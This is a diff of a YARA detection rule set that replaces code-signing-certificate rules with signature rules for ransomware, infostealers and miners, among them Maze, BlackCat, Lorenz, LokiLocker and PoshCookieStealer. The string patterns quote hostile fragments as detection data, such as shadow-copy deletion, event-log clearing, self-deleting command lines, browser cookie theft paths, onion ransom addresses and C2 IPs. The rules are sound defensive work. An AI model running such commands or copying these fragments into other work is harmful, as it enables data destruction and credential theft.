+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9051-L9064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee543c204e5bf004224a2010f8cfd3196bb9c1e96de350548403224eaa502f6"
+		logic_hash = "f6b81c2276765455d46e20ed81e19caa3ae36a31827568486a09bc1619ec478c"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "ddfd6a93a8d33f0797d5fdfdb9abf2b66e64350a"
-		importance = 20
+		tags = ""
+		snort_sid = "920284"
+
+	strings:
+		$s1 = "$Core | Add-Member @{IsReadOnly = $((Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly)} -Force" fullword ascii
+		$s2 = "$Core | Add-Member @{MinerCustomConfig = $((Get-Content \".\\Config\\MinerCustomConfig.json\" -Raw))} -Force" fullword ascii
+		$s3 = "If ($Variables.CheatGuy -and $Core.corehash -in $Hashes -and $Core.ScriptStartDate -le (Get-Date)" ascii
+		$s4 = "Try{(Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly = $false} catch {}" fullword ascii
+		$s5 = " NPlusMiner/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceeacfeacafdcdffabdbbacf" and pe.signatures [ i ] . serial == "0b:57:59:bc:22:ad:21:28:b8:79:2e:85:35:f9:16:1e" )
+		3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_630Cf0E612F12805Ffa00A41D1032D7C : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshcookiestealer
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell PoshCookieStealer"
 		author = "ditekSHen"
-		id = "1c3e2b33-24e5-584c-b375-96c1e653a3ca"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7326a056-288b-534b-811d-172bd6936d7b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3399-L3410"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9066-L9080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2256858ae75c47568fc6a38e2a587d302d99dd396dd398a450eaa6459ed55d13"
+		logic_hash = "234958098d09732675dd539e8d25c6754ba50bf92b3a19e7fef8c68d70503ec4"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "107af72db66ec4005ed432e4150a0b6f5a9daf2d"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "\\User Data\\default\\Network\\Cookies" ascii nocase
+		$s2 = "Send-ToEmail" ascii
+		$s3 = "[Security.Cryptography.ProtectedData]::Unprotect($" ascii
+		$s4 = "$($env:LOCALAPPDATA)\\" ascii
+		$s5 = "$($env:HOMEPATH)\\" ascii
+		$s6 = "|ForEach-Object ToString X2) -join ''" ascii
+		$s7 = ".Attachments.Add($" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadebfaca" and pe.signatures [ i ] . serial == "63:0c:f0:e6:12:f1:28:05:ff:a0:0a:41:d1:03:2d:7c" )
+		5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_603Bce30597089D068320Fc77E400D06 : FILE
+rule DITEKSHEN_MALWARE_Win_Garrantdecrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GarrantDecrypt ransomware"
 		author = "ditekSHen"
-		id = "0f2a2411-f3d4-5959-8470-d7424d714c1d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e3be3663-9978-5b8e-b6b2-0f44f269adb2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3412-L3423"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9082-L9096"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e13c78cec21a015d9593b492ce5040f93247be63c079bfece96a3a74055aeba"
+		logic_hash = "84b139e51f0ef0389c641d62409d702b0ae7ec6ecd2fa54baf2cf0c0078a8f5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ddda7e006afb108417627f8f22a6fa416e3f264"
-		importance = 20
+
+	strings:
+		$x1 = "%appdata%\\_uninstalling_.png" fullword wide
+		$x2 = "C:\\Windows\\sysnative\\vssadmin.exe" fullword wide
+		$x3 = /(ICQ|Skype) (@nuncatarde|@supersuso|@Whitehorsedecryption|@likeahorse|@Konwarszawski|@zipzipulya|Whitehorsedecryption|LIKEAHORSE DECRYPTION|Zip Zipulya)/ ascii
+		$s1 = "your unique ID" ascii
+		$s2 = "Google market ICQ" ascii
+		$s3 = "If you want to restore them, install ICQ" ascii
+		$s4 = "Write to our ICQ @" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcaddefffedacfc" and pe.signatures [ i ] . serial == "60:3b:ce:30:59:70:89:d0:68:32:0f:c7:7e:40:0d:06" )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $s* ) ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5D5D03Edb4Ec4E185Caa3041824Ab75C : FILE
+rule DITEKSHEN_MALWARE_Win_Locked : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Locked ransomware"
 		author = "ditekSHen"
-		id = "e1c93911-5c7c-5fe8-aed3-014a9bb7379e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ad2f91ab-9bbb-5d47-a5c3-5a38dbab2ebe"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3425-L3436"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9098-L9114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "863a1496ce37449fa7e94c407ce0e63a9d727fef9094135715d0cb14ed442e5e"
+		logic_hash = "b838b996946fb268c66bac68d5e326ff3049340dfb08f2e0a77492df49915d5a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "f6c9c564badc1bbd8a804c5e20ab1a0eff89d4c0"
-		importance = 20
+
+	strings:
+		$x1 = "http://xxxx.onion/xxxx-xxxx-xxxx-xxxx" ascii
+		$x2 = "http://pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion" ascii
+		$x3 = "dHA6Ly94eHh4Lm9uaW9uL3h4eHgteHh4eC14eHh4LXh4eHg" ascii
+		$s1 = "choice /t 1 /d y /n >nul" ascii
+		$s2 = ".locked" fullword ascii
+		$s3 = "c:\\system volume information" fullword ascii
+		$s4 = "__$$RECOVERY_README$$__.html" fullword ascii
+		$s5 = "Trunc..." fullword ascii
+		$s6 = /C:\\windows\\temp\\[a-z0-9A-Z]{6}\.tmp/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffcdcbacfeaedbfbcecccafeb" and pe.signatures [ i ] . serial == "5d:5d:03:ed:b4:ec:4e:18:5c:aa:30:41:82:4a:b7:5c" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( #s6 > 1 and 4 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Aec009984Fa957F3F48Fe3104Ca9Babc : FILE
+rule DITEKSHEN_MALWARE_Win_Maze : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Maze ransomware"
 		author = "ditekSHen"
-		id = "76b5d6b6-f443-55b5-b353-88201fe09e1f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3438-L3449"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9116-L9145"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de9008e30468b94b4afbc622403b0257f5c5e3964344b980c18fc95219e06667"
+		logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d5b6bc86775395992a25d21d696d05d634a89d1"
-		importance = 20
+
+	strings:
+		$x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii
+		$s1 = "\"%s\" shadowcopy delete" wide
+		$s2 = "[%windir%\\system32\\wbem\\wmic" wide
+		$s3 = "process call create \"cmd /c start %s\"" wide
+		$s4 = "DECRYPT-FILES.html" fullword wide
+		$s5 = "Dear %s, your files" wide
+		$s6 = "%s! Alert! %s! Alert!" wide
+		$s7 = "%BASE64_PLACEHOLDER%" fullword ascii
+		$s8 = "-orDGorX0or" fullword ascii
+		$s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31
+               0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73
+               0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e
+               65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69
+               76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20
+               48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41
+               67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20
+               25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
+               3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65
+               6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63
+               74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65
+               0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e
+               74 2d 4c 65 6e 67 74 68 3a 20 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceefaccdedbfbbaaaadacdbf" and pe.signatures [ i ] . serial == "ae:c0:09:98:4f:a9:57:f3:f4:8f:e3:10:4c:a9:ba:bc" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_283518F1940A11Caf187646D8063D61D : FILE
+rule DITEKSHEN_MALWARE_Win_Teslarevenge : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TeslaRevenge ransomware"
 		author = "ditekSHen"
-		id = "cf5f7f11-3af6-577b-9a5e-eafe2de34e2b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "13e5bb15-47eb-5e49-a1a5-3d51cacede2f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3451-L3462"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9147-L9167"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7db16bc44059e2538eb896011598a599c6aead90fb873c530ce8f5391e440164"
+		logic_hash = "0f68eae8a076d00c8d058ec148d3557f5770dc827d4690b931faf98797426dbc"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
-		thumbprint = "aaeb19203b71e26c857613a5a2ba298c79910f5d"
-		importance = 20
+
+	strings:
+		$s1 = "autospreadifnoav=" ascii wide
+		$s2 = "autospread=" ascii wide
+		$s3 = "noencryptext=" ascii wide
+		$s4 = "teslarvng" wide
+		$s5 = "finished encrypting" wide nocase
+		$s6 = "net scan" wide nocase
+		$s7 = "for /f %%x in ('wevtutil el') do wevtutil cl" ascii
+		$s8 = "tasklist | find /i \"SDELETE.exe\"" ascii
+		$e1 = "mshta.exe" ascii wide nocase
+		$e2 = "sc.exe" ascii wide nocase
+		$e3 = "vssadmin.exe" ascii wide nocase
+		$e4 = "wbadmin.exe" ascii wide nocase
+		$e5 = "cmd.exe" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eeeeeeba" and pe.signatures [ i ] . serial == "28:35:18:f1:94:0a:11:ca:f1:87:64:6d:80:63:d6:1d" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $e* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_72F3E4707B94D0Eef214384De9B36E : FILE
+rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LokiLocker ransomware"
 		author = "ditekSHen"
-		id = "bf02ea89-b3f3-58a1-8bcd-1a23b3c96b68"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3464-L3475"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9169-L9194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2a310ff70012076856239b5b5e6b46ffa121479dea38815e61f5336cecf8868"
+		logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e2a5a2823b0a56c88bfcb2788aa4406e084c4c9b"
-		importance = 20
+
+	strings:
+		$x1 = "SOFTWARE\\Loki" fullword wide
+		$x2 = "Cpriv.Loki" fullword wide
+		$x3 = "Loki/" wide
+		$x4 = /loki(\s)?locker/ fullword wide nocase
+		$s1 = "Restore-My-Files.txt" wide
+		$s2 = "loading encryption keys" wide
+		$s3 = "Kill switch -> enabled" wide
+		$s4 = "ScanSMBShares" fullword ascii
+		$s5 = "RewriteMBR" fullword ascii
+		$s6 = /Encrypt(Drives|File|WinVolume|OsDrive)/ fullword ascii
+		$n1 = "unique-id=" ascii wide
+		$n2 = "&disk-size=" ascii wide
+		$n3 = "&user=Darwin&cpu-name=" ascii wide
+		$n4 = "&ram-size=" ascii wide
+		$n5 = "&os-name=" ascii wide
+		$n6 = "&chat-id=" ascii wide
+		$n7 = "&msg-id=" ascii wide
+		$n8 = "&elapsed-time=" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eaaebecedccfd" and pe.signatures [ i ] . serial == "72:f3:e4:70:7b:94:d0:ee:f2:14:38:4d:e9:b3:6e" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $s* ) or 6 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $n* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D875B3E3F2Db6C3Eb426E24946066111 : FILE
+rule DITEKSHEN_MALWARE_Osx_Dazzlespy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Attemp at hunting for DazzleSpy"
 		author = "ditekSHen"
-		id = "a44cde8b-904b-5f1a-8cdb-4a8b16a42669"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8c5f6605-13d2-578e-9e0b-6a8226991ac5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3477-L3488"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9196-L9210"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "470424bf28b723063be5d6801ee27b0f3748b761f9005616dcab4bd864db5463"
-		score = 75
-		quality = 75
+		logic_hash = "61305384055f71d92ce2ac3d427a1b6f85ce21f502e759f3af952127b1413470"
+		score = 50
+		quality = 71
 		tags = "FILE"
-		thumbprint = "d27211a59dc8a4b3073d116621b6857c3d70ed04"
-		importance = 20
+
+	strings:
+		$x1 = "/osxrk_commandline/" ascii wide nocase
+		$x2 = "/Users/wangping/pangu/" ascii wide nocase
+		$s1 = "heartbeat" ascii wide
+		$s2 = "scanFiles" ascii wide
+		$s3 = "restartCMD" ascii wide
+		$s4 = "downloadFile" ascii wide
+		$s5 = "RDPInfo" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" )
+		uint16( 0 ) == 0xfacf and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3990362C34015Ce4C23Ecc3377Fd3C06 : FILE
+rule DITEKSHEN_MALWARE_Win_Bhunt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BHunt infostealer"
 		author = "ditekSHen"
-		id = "e76824c2-6ee7-5117-a83f-0b8e4f2d3b61"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4c699f10-64a0-5e3c-af00-e08ebe1c6830"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3490-L3501"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9212-L9233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e91a10f5027cae35524bef326edf7d5bf3df5bbc37c111b01e33f7667b03ce3"
+		logic_hash = "ca0a7e6898047fa3b369125a4402e2beffd328a5db47b1d5dd5914a86d6f0073"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "48444dec9d6839734d8383b110faabe05e697d45"
-		importance = 20
+
+	strings:
+		$x1 = "BHUNT.Resources.resources" fullword ascii
+		$x2 = "//minecraftsquid.hopto.org/" wide
+		$s1 = "chaos_crew" ascii wide
+		$s2 = "golden7" ascii wide
+		$s3 = "mrpropper" ascii wide
+		$s4 = "/ifo.php?" ascii wide
+		$s5 = "bonanza=:=" ascii wide
+		$s6 = "blackjack=:=" ascii wide
+		$s7 = "SendPostData" fullword ascii
+		$c1 = "cmd /c REG ADD" wide
+		$c2 = "taskkill /F /IM" wide
+		$c3 = "cmd.exe /c wmic" wide
+		$g1 = "$ca9a291d-266c-41dc-9f1c-93cfe0dcac16" fullword ascii
+		$g2 = "$6d0feb35-213d-4b9f-afc7-06d168cfcb5e" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and ( 5 of ( $s* ) or 2 of ( $c* ) ) ) or ( 6 of ( $s* ) and 2 of ( $c* ) ) or ( all of ( $g* ) and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_54A6D33F73129E0Ef059Ccf51Be0C35E : FILE
+rule DITEKSHEN_MALWARE_Win_Lorenz : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Lorenz ransomware"
 		author = "ditekSHen"
-		id = "7b010276-718f-5168-bd8c-414252996fe6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9c11cfbc-aa77-5138-81e4-3a5f4f21a470"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3503-L3514"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9235-L9265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "93b332e4ad4e13c7e8241cf866091708232a6555a9240d828e558688167359a0"
+		logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8ada307ab3a8983857d122c4cb48bf3b77b49c63"
-		importance = 20
+
+	strings:
+		$x1 = "143.198.117.43" fullword ascii
+		$x2 = "157.90.147.28" fullword ascii
+		$x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
+		$x4 = "http://lorenz" ascii
+		$x5 = "\\lora\\Release\\lora.pdb" ascii
+		$x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii
+		$x7 = "/USER:'HOMEOFFICE.COM\\" ascii
+		$x8 = "/USER:'Sentinel.com\\" ascii
+		$s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide
+		$s2 = "*it == '\\0'" fullword wide
+		$s3 = "process call create 'cmd.exe /c" ascii
+		$s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii
+		$s5 = "HELP_SECURITY_EVENT.html" ascii
+		$s6 = "<br>[+] Whats Happen?" ascii
+		$s7 = /\.Lorenz\.sz\d+$/ fullword ascii
+		$s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii
+		$s9 = ".Speak(\"You've been hack" ascii nocase
+		$s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii
+		$n1 = "ame_serv=" ascii
+		$n2 = "&ip=" ascii
+		$n3 = "&winver=Windows" ascii
+		$n4 = "&list_drive=" ascii
+		$n5 = "&file=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $n* ) and 2 of them ) or ( 1 of ( $x* ) and 6 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A55C15F733Bf1633E9Ffae8A6E3B37D : FILE
+rule DITEKSHEN_MALWARE_Win_Blackcat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackCat ransomware"
 		author = "ditekSHen"
-		id = "86d8453b-115d-59f8-8123-5aff071ec3dd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b6831d84-40d7-52ae-8c4d-30b087b0007b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3516-L3527"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9267-L9289"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a772edb12dc0c351bb4d11f3e6ab3d9705af156ebeb4b8fff281bb418bfa1764"
+		logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "591f68885fc805a10996262c93aab498c81f3010"
-		importance = 20
+
+	strings:
+		$x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii
+		$x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii
+		$s1 = "encrypt_app::windows" ascii
+		$s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii
+		$s3 = "uac_bypass::shell_exec=" ascii
+		$s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii
+		$s5 = "masquerade_peb" ascii
+		$s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii
+		$s7 = ".onion/?access-key=${ACCESS_KEY}" ascii
+		$s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii
+		$s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii
+		$s10 = /enum_(shares|servers)_sync::ok/ fullword ascii
+		$s11 = "hidden_partitions::mount_all::mounting=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F675139Ea68B897A865A98F8E4611F00 : FILE
+rule DITEKSHEN_MALWARE_Win_Koxic : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Koxic ransomware"
 		author = "ditekSHen"
-		id = "7035ed66-73f9-568e-9698-13d9bbede64e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6a82bf44-b155-5746-b798-20a13623a14a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3529-L3540"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9291-L9309"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9893e21fd2d5a475c9defb484921de17f4afc00619be413b9d5d55095e7f596a"
+		logic_hash = "d874c8ebf330814e52d159cbf71f8bc05ebeb4a9fb93d96c3f861b51e57925a3"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "06d46ee9037080c003983d76be3216b7cad528f8"
-		importance = 20
+
+	strings:
+		$c1 = " INFO: >> %TEMP%\\" ascii wide
+		$c2 = "cmd /c \"wmic" ascii wide
+		$c3 = "cmd /c \"echo" ascii wide
+		$c4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"" fullword wide
+		$c5 = /sc config.{1,30}start=disabled/ fullword ascii wide
+		$s1 = "Container: %s" fullword wide
+		$s2 = "Shotcut dir : %s" fullword wide
+		$s3 = "\\Microsoft\\Windows\\Network Shortcuts\\" fullword wide
